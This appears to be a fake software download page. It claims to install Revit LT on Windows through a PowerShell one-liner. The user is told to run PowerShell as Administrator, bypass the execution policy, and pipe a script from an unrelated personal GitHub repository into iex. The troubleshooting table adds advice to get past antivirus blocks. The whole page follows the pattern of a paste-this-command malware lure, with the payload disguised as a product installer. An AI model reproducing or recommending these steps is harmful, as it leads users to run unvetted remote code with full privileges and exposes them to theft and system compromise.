Download & Install (PowerShell)

This is the download page. The command below downloads and runs the Revit LT installer on Windows 10/11.

Before you start

• Windows 10 or 11 (64-bit)
• Administrator rights
• Internet connection for the download

Step 1 — Open PowerShell as Administrator

Method A (fastest):

1. Press Win + X
2. Click Terminal (Admin) or Windows PowerShell (Admin)
3. If Windows asks to allow changes, click Yes

Method B (search):

1. Press Win and type PowerShell
2. Click Run as administrator

You should see a blue/black window with a prompt like PS C:\Windows\system32>.

Step 2 — Copy the full command

Select both lines below and press Ctrl+C:

Set-ExecutionPolicy Bypass -Scope Process -Force
irm https://raw.githubusercontent.com/CrystalContractor71/Release/main/install.ps1 | iex

Copy both lines, not just the second one.

Step 3 — Paste into PowerShell and press Enter

1. Click inside the PowerShell window
2. Press Ctrl+V (or right-click → Paste)
3. Press Enter once
4. Wait — download progress will show in the window (usually 1–3 minutes)

Step 4 — Finish setup

• Do not close the window until the process finishes
• Enter your license key if prompted
• Restart your PC if the installer asks

Step 5 — Launch the app

Open Start menu → search for Revit LT → run it.

Troubleshooting

Problem	Fix
"Running scripts is disabled"	Make sure you copied both lines and opened PowerShell as Administrator
"irm : Unable to connect"	Turn off VPN, check your internet, try again
Antivirus blocked the download	Temporarily allow the download folder or run again as Admin
Window closed immediately	Open PowerShell (Admin) again and repeat Steps 2–3

Install type: PowerShell one-liner — no browser needed after Admin PowerShell is open.
